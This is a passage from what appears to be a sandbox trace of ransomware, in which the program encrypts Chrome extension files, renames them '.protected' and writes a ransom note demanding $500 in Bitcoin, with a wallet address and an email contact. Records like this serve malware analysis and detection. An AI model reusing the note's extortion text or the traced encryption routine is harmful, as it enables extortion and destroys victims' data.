returned 155 [0080.538] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.538] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.538] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.539] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.539] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.539] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.540] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.540] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.540] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.540] CloseHandle (hObject=0x168) returned 1 [0080.540] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected") returned 165 [0080.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected")) returned 1 [0080.540] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.540] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.541] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\RESTORE_FILES.txt") returned 159 [0080.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.541] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.541] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.542] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.542] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.542] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.542] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.542] CloseHandle (hObject=0x164) returned 1 [0080.542] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0080.542] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0080.542] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it") returned 141 [0080.542] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0080.542] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0080.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*") returned 143 [0080.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\.") returned 143 [0080.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.542] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\..") returned 144 [0080.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.543] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.543] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.543] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.544] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb6, lpOverlapped=0x0) returned 1 [0080.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb6, lpOverlapped=0x0) returned 1 [0080.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.545] CloseHandle (hObject=0x168) returned 1 [0080.546] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected") returned 165 [0080.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected")) returned 1 [0080.546] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.546] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.547] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0080.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.547] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.547] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.548] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.548] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.548] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.548] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.548] CloseHandle (hObject=0x164) returned 1 [0080.548] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Windows") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Program Files") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Program Files (x86)") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="$Recycle.bin") returned 1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="System Volume Information") returned -1 [0080.548] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw") returned 141 [0080.548] lstrcmpW (lpString1="iw", lpString2=".") returned 1 [0080.548] lstrcmpW (lpString1="iw", lpString2="..") returned 1 [0080.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*") returned 143 [0080.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\.") returned 143 [0080.549] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.549] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\..") returned 144 [0080.549] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.549] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.549] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.549] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 